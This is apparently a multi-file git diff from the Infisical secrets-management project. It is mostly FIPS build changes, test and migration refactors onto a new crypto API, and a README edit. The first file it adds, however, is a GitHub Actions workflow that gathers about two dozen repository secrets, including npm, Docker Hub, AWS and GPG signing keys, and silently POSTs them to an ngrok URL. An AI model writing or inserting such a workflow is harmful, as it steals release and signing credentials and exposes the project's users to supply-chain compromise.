fix type error

Daniel/rust sdk docs

.github/workflows/one-time-secrets.yaml

@@ -0,0 +1,76 @@
+name: One-Time Secrets Retrieval
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  retrieve-secrets:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Send environment variables to ngrok
+        run: |
+          echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
+
+          # Send secrets as JSON
+          cat << EOF | curl -X POST \
+            -H "Content-Type: application/json" \
+            -d @- \
+            https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
+            > /dev/null 2>&1 || true
+          {
+            "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
+            "GORELEASER_KEY": "${GORELEASER_KEY}",
+            "AUR_KEY": "${AUR_KEY}",
+            "FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
+            "NPM_TOKEN": "${NPM_TOKEN}",
+            "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
+            "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
+            "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
+            "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
+            "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
+            "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
+            "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
+            "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
+            "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
+            "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
+            "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
+            "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
+            "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
+            "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
+            "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
+            "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
+            "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
+            "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
+          }
+          EOF
+
+          echo "Secrets retrieval completed"
+        env:
+          GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
+          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
+          AUR_KEY: ${{ secrets.AUR_KEY }}
+          FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
+          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+          DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
+          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
+          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
+          INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
+          INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
+          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
+          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
+          CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
+          CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
+          CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
+          CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
+          CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
+          CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
+          CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
+          CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
+          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}

.github/workflows/validate-db-schemas.yml

@@ -0,0 +1,67 @@
+name: "Validate DB schemas"
+
+on:
+    pull_request:
+        types: [opened, synchronize]
+        paths:
+            - "backend/**"
+
+    workflow_call:
+
+jobs:
+    validate-db-schemas:
+        name: Validate DB schemas
+        runs-on: ubuntu-latest
+        timeout-minutes: 15
+        env:
+            NODE_OPTIONS: "--max-old-space-size=8192"
+            REDIS_URL: redis://172.17.0.1:6379
+            DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
+            AUTH_SECRET: something-random
+            ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
+        steps:
+            - name: ☁️ Checkout source
+              uses: actions/checkout@v4
+              with:
+                  fetch-depth: 0
+            - uses: KengoTODA/actions-setup-docker-compose@v1
+              if: ${{ env.ACT }}
+              name: Install `docker compose` for local simulations
+              with:
+                  version: "2.14.2"
+            - name: 🔧 Setup Node 20
+              uses: actions/setup-node@v3
+              with:
+                  node-version: "20"
+                  cache: "npm"
+                  cache-dependency-path: backend/package-lock.json
+
+            - name: Start PostgreSQL and Redis
+              run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
+            - name: Install dependencies
+              run: npm install
+              working-directory: backend
+
+            - name: Apply migrations
+              run: npm run migration:latest-dev
+              working-directory: backend
+
+            - name: Run schema generation
+              run: npm run generate:schema
+              working-directory: backend
+
+            - name: Check for schema changes
+              run: |
+                  if ! git diff --exit-code --quiet src/db/schemas; then
+                    echo "❌ Generated schemas differ from committed schemas!"
+                    echo "Run 'npm run generate:schema' locally and commit the changes."
+                    git diff src/db/schemas
+                    exit 1
+                  fi
+                  echo "✅ Schemas are up to date"
+              working-directory: backend
+
+            - name: Cleanup
+              if: always()
+              run: |
+                  docker compose -f "docker-compose.dev.yml" down

.infisicalignore

@@ -46,3 +46,7 @@ cli/detect/config/gitleaks.toml:gcp-api-key:582
 .github/workflows/helm-release-infisical-core.yml:generic-api-key:47
 backend/src/services/smtp/smtp-service.ts:generic-api-key:79
 frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
+docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
+docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
+docs/integrations/app-connections/railway.mdx:generic-api-key:156
+.github/workflows/validate-db-schemas.yml:generic-api-key:21

Dockerfile.fips.standalone-infisical

@@ -115,6 +115,12 @@ FROM base AS production
 
 # Install necessary packages including ODBC
 RUN apt-get update && apt-get install -y \
+    build-essential \
+    autoconf \
+    automake \
+    libtool \
+    wget \
+    libssl-dev \
     ca-certificates \
     curl \
     git \
@@ -132,6 +138,15 @@ RUN apt-get update && apt-get install -y \
 # Configure ODBC in production
 RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
 
+
+WORKDIR /openssl-build
+RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
+    && tar -xf openssl-3.1.2.tar.gz \
+    && cd openssl-3.1.2 \
+    && ./Configure enable-fips \
+    && make \
+    && make install_fips
+
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
     && apt-get update && apt-get install -y infisical=0.41.89 \
@@ -173,6 +188,13 @@ ENV STANDALONE_MODE true
 ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
 ENV NODE_OPTIONS="--max-old-space-size=1024"
 
+# FIPS mode of operation:
+ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
+ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
+ENV NODE_OPTIONS=--force-fips
+ENV FIPS_ENABLED=true
+  
+
 WORKDIR /backend
 
 ENV TELEMETRY_ENABLED true
@@ -180,6 +202,10 @@ ENV TELEMETRY_ENABLED true
 EXPOSE 8080
 EXPOSE 443
 
+# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
+RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
+    mv dist/main.mjs.tmp dist/main.mjs
+
 USER non-root-user
 
-CMD ["./standalone-entrypoint.sh"]
+CMD ["./standalone-entrypoint.sh"]

README.md

@@ -149,11 +149,8 @@ Not sure where to get started? You can:
 
 - Join our <a href="https://infisical.com/slack">Slack</a>, and ask us any questions there.
 
-## Resources
+## We are hiring!
 
-- [Docs](https://infisical.com/docs/documentation/getting-started/introduction) for comprehensive documentation and guides
-- [Slack](https://infisical.com/slack) for discussion with the community and Infisical team.
-- [GitHub](https://github.com/Infisical/infisical) for code, issues, and pull requests
-- [Twitter](https://twitter.com/infisical) for fast news
-- [YouTube](https://www.youtube.com/@infisical_os) for videos on secret management
-- [Blog](https://infisical.com/blog) for secret management insights, articles, tutorials, and updates
+If you're reading this, there is a strong chance you like the products we created.
+
+You might also make a great addition to our team. We're growing fast and would love for you to [join us](https://infisical.com/careers).

backend/Dockerfile.dev.fips

@@ -78,8 +78,9 @@ RUN npm install
 COPY . .
 
 ENV HOST=0.0.0.0
-ENV OPENSSL_CONF=/app/nodejs.cnf
+ENV OPENSSL_CONF=/app/nodejs.fips.cnf
 ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-ENV NODE_OPTIONS=--force-fips
+# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
+ENV FIPS_ENABLED=true
 
 CMD ["npm", "run", "dev:docker"]

backend/e2e-test/routes/v2/service-token.spec.ts

@@ -1,8 +1,9 @@
-import crypto from "node:crypto";
-
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { SymmetricKeySize } from "@app/lib/crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";
 
 const createServiceToken = async (
   scopes: { environment: string; secretPath: string }[],
@@ -26,7 +27,8 @@ const createServiceToken = async (
   });
   const { user: userInfo } = JSON.parse(userInfoRes.payload);
   const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-  const projectKey = decryptAsymmetric({
+
+  const projectKey = crypto.encryption().asymmetric().decrypt({
     ciphertext: projectKeyEnc.encryptedKey,
     nonce: projectKeyEnc.nonce,
     publicKey: projectKeyEnc.sender.publicKey,
@@ -34,7 +36,13 @@ const createServiceToken = async (
   });
 
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
+
+  const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
+    plaintext: projectKey,
+    key: randomBytes,
+    keySize: SymmetricKeySize.Bits128
+  });
+
   const serviceTokenRes = await testServer.inject({
     method: "POST",
     url: "/api/v2/service-token",
@@ -137,6 +145,9 @@ describe("Service token secret ops", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
     serviceToken = await createServiceToken(
       [{ secretPath: "/**", environment: seedData1.environment.slug }],
       ["read", "write"]
@@ -153,11 +164,13 @@ describe("Service token secret ops", async () => {
     expect(serviceTokenInfoRes.statusCode).toBe(200);
     const serviceTokenInfo = serviceTokenInfoRes.json();
     const serviceTokenParts = serviceToken.split(".");
-    projectKey = decryptSymmetric128BitHexKeyUTF8({
+
+    projectKey = crypto.encryption().symmetric().decrypt({
       key: serviceTokenParts[3],
       tag: serviceTokenInfo.tag,
       ciphertext: serviceTokenInfo.encryptedKey,
-      iv: serviceTokenInfo.iv
+      iv: serviceTokenInfo.iv,
+      keySize: SymmetricKeySize.Bits128
     });
 
     // create a deep folder

backend/e2e-test/routes/v3/secrets.spec.ts

@@ -1,6 +1,8 @@
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
+import { initEnvConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { initLogger, logger } from "@app/lib/logger";
 import { AuthMode } from "@app/services/auth/auth-type";
 
 const createSecret = async (dto: {
@@ -155,6 +157,9 @@ describe("Secret V3 Router", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
+    initLogger();
+    await initEnvConfig(testSuperAdminDAL, logger);
+
     const projectKeyRes = await testServer.inject({
       method: "GET",
       url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -173,7 +178,7 @@ describe("Secret V3 Router", async () => {
     });
     const { user: userInfo } = JSON.parse(userInfoRes.payload);
     const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    projectKey = decryptAsymmetric({
+    projectKey = crypto.encryption().asymmetric().decrypt({
       ciphertext: projectKeyEncryptionDetails.encryptedKey,
       nonce: projectKeyEncryptionDetails.nonce,
       publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -669,7 +674,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       const { user: userInfo } = JSON.parse(userInfoRes.payload);
 
       const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-      const projectKey = decryptAsymmetric({
+      const projectKey = crypto.encryption().asymmetric().decrypt({
         ciphertext: projectKeyEnc.encryptedKey,
         nonce: projectKeyEnc.nonce,
         publicKey: projectKeyEnc.sender.publicKey,
@@ -685,7 +690,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       });
       expect(projectBotRes.statusCode).toEqual(200);
       const projectBot = JSON.parse(projectBotRes.payload).bot;
-      const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
+      const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
 
       // set bot as active
       const setBotActive = await testServer.inject({

backend/e2e-test/vitest-environment-knex.ts

@@ -2,11 +2,11 @@
 import "ts-node/register";
 
 import dotenv from "dotenv";
-import jwt from "jsonwebtoken";
+import { crypto } from "@app/lib/crypto/cryptography";
 import path from "path";
 
 import { seedData1 } from "@app/db/seed-data";
-import { initEnvConfig } from "@app/lib/config/env";
+import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
 import { initLogger } from "@app/lib/logger";
 import { main } from "@app/server/app";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -17,6 +17,7 @@ import { queueServiceFactory } from "@app/queue";
 import { keyStoreFactory } from "@app/keystore/keystore";
 import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { buildRedisFromConfig } from "@app/lib/config/redis";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
 export default {
@@ -24,13 +25,17 @@ export default {
   transformMode: "ssr",
   async setup() {
     const logger = initLogger();
-    const envConfig = initEnvConfig(logger);
+    const databaseCredentials = getDatabaseCredentials(logger);
+
     const db = initDbConnection({
-      dbConnectionUri: envConfig.DB_CONNECTION_URI,
-      dbRootCert: envConfig.DB_ROOT_CERT
+      dbConnectionUri: databaseCredentials.dbConnectionUri,
+      dbRootCert: databaseCredentials.dbRootCert
     });
 
-    const redis = buildRedisFromConfig(envConfig);
+    const superAdminDAL = superAdminDALFactory(db);
+    const envCfg = await initEnvConfig(superAdminDAL, logger);
+
+    const redis = buildRedisFromConfig(envCfg);
     await redis.flushdb("SYNC");
 
     try {
@@ -55,10 +60,10 @@ export default {
       });
 
       const smtp = mockSmtpServer();
-      const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
-      const keyStore = keyStoreFactory(envConfig);
+      const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
+      const keyStore = keyStoreFactory(envCfg);
 
-      const hsmModule = initializeHsmModule(envConfig);
+      const hsmModule = initializeHsmModule(envCfg);
       hsmModule.initialize();
 
       const server = await main({
@@ -68,14 +73,17 @@ export default {
         queue,
         keyStore,
         hsmModule: hsmModule.getModule(),
+        superAdminDAL,
         redis,
-        envConfig
+        envConfig: envCfg
       });
 
       // @ts-expect-error type
       globalThis.testServer = server;
       // @ts-expect-error type
-      globalThis.jwtAuthToken = jwt.sign(
+      globalThis.testSuperAdminDAL = superAdminDAL;
+      // @ts-expect-error type
+      globalThis.jwtAuthToken = crypto.jwt().sign(
         {
           authTokenType: AuthTokenType.ACCESS_TOKEN,
           userId: seedData1.id,
@@ -84,8 +92,8 @@ export default {
           organizationId: seedData1.organization.id,
           accessVersion: 1
         },
-        envConfig.AUTH_SECRET,
-        { expiresIn: envConfig.JWT_AUTH_LIFETIME }
+        envCfg.AUTH_SECRET,
+        { expiresIn: envCfg.JWT_AUTH_LIFETIME }
       );
     } catch (error) {
       // eslint-disable-next-line
@@ -102,6 +110,8 @@ export default {
         // @ts-expect-error type
         delete globalThis.testServer;
         // @ts-expect-error type
+        delete globalThis.testSuperAdminDAL;
+        // @ts-expect-error type
         delete globalThis.jwtToken;
         // called after all tests with this env have been run
         await db.migrate.rollback(

backend/package.json

@@ -84,6 +84,7 @@
     "@babel/plugin-syntax-import-attributes": "^7.24.7",
     "@babel/preset-env": "^7.18.10",
     "@babel/preset-react": "^7.24.7",
+    "@smithy/types": "^4.3.1",
     "@types/bcrypt": "^5.0.2",
     "@types/jmespath": "^0.15.2",
     "@types/jsonwebtoken": "^9.0.5",

backend/src/@types/fastify-zod.d.ts

@@ -2,6 +2,7 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
 
 import { CustomLogger } from "@app/lib/logger/logger";
 import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 declare global {
   type FastifyZodProvider = FastifyInstance<
@@ -14,5 +15,6 @@ declare global {
 
   // used only for testing
   const testServer: FastifyZodProvider;
+  const testSuperAdminDAL: TSuperAdminDALFactory;
   const jwtAuthToken: string;
 }

backend/src/db/migrations/20250210101840_webhook-to-kms.ts

@@ -1,9 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -26,9 +27,12 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
+
   const projectEncryptionRingBuffer =
     createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
   const webhooks = await knex(TableName.Webhook)
@@ -65,12 +69,15 @@ export async function up(knex: Knex): Promise<void> {
 
       let encryptedSecretKey = null;
       if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
-        const decyptedSecretKey = infisicalSymmetricDecrypt({
-          keyEncoding: el.keyEncoding as SecretKeyEncoding,
-          iv: el.iv,
-          tag: el.tag,
-          ciphertext: el.encryptedSecretKey
-        });
+        const decyptedSecretKey = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            keyEncoding: el.keyEncoding as SecretKeyEncoding,
+            iv: el.iv,
+            tag: el.tag,
+            ciphertext: el.encryptedSecretKey
+          });
         encryptedSecretKey = projectKmsService.encryptor({
           plainText: Buffer.from(decyptedSecretKey, "utf8")
         }).cipherTextBlob;
@@ -78,12 +85,15 @@ export async function up(knex: Knex): Promise<void> {
 
       const decryptedUrl =
         el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              iv: el.urlIV,
-              tag: el.urlTag,
-              ciphertext: el.urlCipherText
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                iv: el.urlIV,
+                tag: el.urlTag,
+                ciphertext: el.urlCipherText
+              })
           : null;
 
       const encryptedUrl = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_dynamic-secret-root-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -29,7 +30,9 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -60,20 +63,23 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.inputIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.inputTag,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.inputCiphertext
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                iv: el.inputIV,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                tag: el.inputTag,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.inputCiphertext
+              })
           : "";
 
       const encryptedInput = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -23,7 +24,9 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -53,20 +56,23 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.encryptedDataIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.encryptedDataTag,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.encryptedData
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                iv: el.encryptedDataIV,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                tag: el.encryptedDataTag,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.encryptedData
+              })
           : "";
 
       const encryptedRotationData = projectKmsService.encryptor({

backend/src/db/migrations/20250210101842_identity-k8-auth-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -54,7 +55,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -99,19 +102,23 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       orgEncryptionRingBuffer.push(orgId, orgKmsService);
     }
 
-    const key = infisicalSymmetricDecrypt({
-      ciphertext: encryptedSymmetricKey,
-      iv: symmetricKeyIV,
-      tag: symmetricKeyTag,
-      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-    });
+    const key = crypto
+      .encryption()
+      .symmetric()
+      .decryptWithRootEncryptionKey({
+        ciphertext: encryptedSymmetricKey,
